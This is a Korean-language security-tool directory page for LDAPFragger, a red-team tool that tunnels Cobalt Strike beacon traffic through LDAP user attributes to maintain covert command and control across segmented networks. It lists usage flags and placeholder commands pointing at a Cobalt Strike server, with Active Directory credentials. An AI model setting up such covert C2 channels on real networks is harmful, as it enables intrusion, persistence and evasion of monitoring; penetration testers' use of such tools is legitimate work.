Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
LDAPFragger — 분할된 네트워크에서 은밀한 명령 및 제어를 위해 LDAP 사용자 속성을 통해 Cobalt Strike 비콘 데이터를 라우팅하는 C2 도구. | Kitploit
도구/GitHubGitHub/fox-it/ldapfragger
Penetration Testing FrameworksExploit FrameworksCommand and ControlRed TeamingPayload Development
GitHubfox-it/ldapfragger

LDAPFragger

분할된 네트워크에서 은밀한 명령 및 제어를 위해 LDAP 사용자 속성을 통해 Cobalt Strike 비콘 데이터를 라우팅하는 C2 도구.

저장소 보기
196286년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

LDAPFragger

LDAPFragger는 공격자가 사용자 속성을 이용해 Cobalt Strike 비콘 데이터를 LDAP을 통해 라우팅할 수 있게 해주는 명령 및 제어 도구입니다.

배경 정보는 릴리스 블로그에서 확인하세요: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes

종속성 및 설치

  • .NET 4.0으로 컴파일되었지만, 이전 및 최신 .NET 프레임워크에서도 작동할 수 있습니다.

사용법

root@kitploit:~
 _     _              __
| |   | |            / _|
| | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __
| |/ _` |/ _` | '_ \|  _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |
|_|\__,_|\__,_| .__/|_| |_|  \__,_|\__, |\__, |\___|_|
              | |                   __/ | __/ |
              |_|                  |___/ |___/

Fox-IT - Rindert Kramer

Usage:
     --cshost:  IP address or hostname of the Cobalt Strike instance
     --csport:  Port of the external C2 interface on the Cobalt Strike server
     -u:        Username to connect to Active Directory
     -p:        Password to connect to Active Directory
     -d:        FQDN of the Active Directory domain
     --ldaps:   Use LDAPS instead of LDAP
     -v:        Verbose output
     -h:        Display  this message

If no AD credentials are provided, integrated AD authentication will be used.

사용 예시:

네트워크 세그먼트 A에서 다음을 실행:

root@kitploit:~
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>

LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

네트워크 세그먼트 B에서 다음을 실행:

root@kitploit:~
LDAPFragger 

LDAPFragger -u <username> -p <password> -d <domain FQDN>

LDAPS는 --LDAPS 플래그로 사용할 수 있지만, 일반 LDAP 트래픽도 암호화됩니다. 기본 Cobalt Strike 페이로드는 대부분의 안티바이러스에 탐지될 수 있음을 유의하세요.

도구 다운로드